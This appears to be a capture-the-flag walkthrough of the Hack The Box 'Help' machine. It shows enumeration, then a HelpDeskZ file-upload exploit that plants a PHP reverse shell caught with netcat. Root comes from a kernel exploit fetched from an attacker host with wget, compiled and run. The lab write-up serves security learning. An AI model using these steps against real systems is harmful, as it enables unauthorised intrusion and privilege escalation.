HTB Help — Walkthrough
Enumeration
So let’s start enumeration with nmap scan
root@ArmourInfosec:/ nmap -sV 10.10.10.121
Nmap scan report for 10.10.10.121 (10.10.10.121)
Host is up (0.22s latency).PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
3000/tcp open http Node.js Express framework
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Let’s visit on port number 80 and see what’s going on there
just Apache default index file nothing else
lets try gobuster with a small wordlist
root@ArmourInfosec:/ gobuster -u http://10.10.10.121 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.10.121/
[+] Threads : 40
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
=====================================================
2019/05/01 08:45:18 Starting gobuster
=====================================================
/support (Status: 301)
/javascript (Status: 301)
=====================================================
2019/05/01 08:45:50 Finished
=====================================================
When we visit http://10.10.10.121/support, there is the “HelpDeskZ :: Support Ticket System”
Ok so search if there is any exploit for it
root@ArmourInfosec:/ searchsploit helpdeskz
Exploitation
Let’s try to exploit it
According to the exploit when we upload a ticket with php or some of the other extension files it shows “File is not allowed” but the file is uploaded and save to a special location under “http://10.10.10.121/support/uploads/tickets” with a encrypted name and the link we can get by the exploit so lets try I’m going to upload php reverse shell as “1.php” (remember to change the IP and Port in shell file if you are also using reverse shell), visit
http://10.10.10.121/support/?v=submit_ticket&action=confirmation
then we run the exploit
root@ArmourInfosec:/ python 40300.py http://10.10.10.121/support/uploads/tickets/ 1.php
root@ArmourInfosec:/ nc -lvp 4444
$ cd /home/help$ cat user.txt
Privilege Escalation
We got the user, for root first let’s have tty shell for that i follow the guif.re linux eop so a simple command
$ python -c ‘import pty;pty.spawn(“/bin/bash”)’
We got the tty shell
Now let’s gather some information about the machine like kernel version etc.
So for that
help@help:/$ uname -a
root@ArmourInfosec:/ searchsploit linux 4.4.0–116
Let’s upload it on the victim machine I will do it with web server service
In Attacker machine
root@ArmourInfosec:/ python -m SimpleHTTPServer 80
In Victim machine
help@help:/$ cd /tmphelp@help:/$ wget http://<Attacker_IP>/44298.c
help@help:/$ gcc 44298.chelp@help:/$ ./a.out
help@help:/$ cd /roothelp@help:/$ cat root.txt
And you got the root!!!!!!!!
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —
What the helpdeskz exploit doing ?
the system is saving invalid file to the tickets directory with a special name as it is taking current time and converting it to string then adding it with filename and generating its md5hash and then saving file with this name so the script is just reversing it and giving us the exaxt link where the response is “200 FOUND”.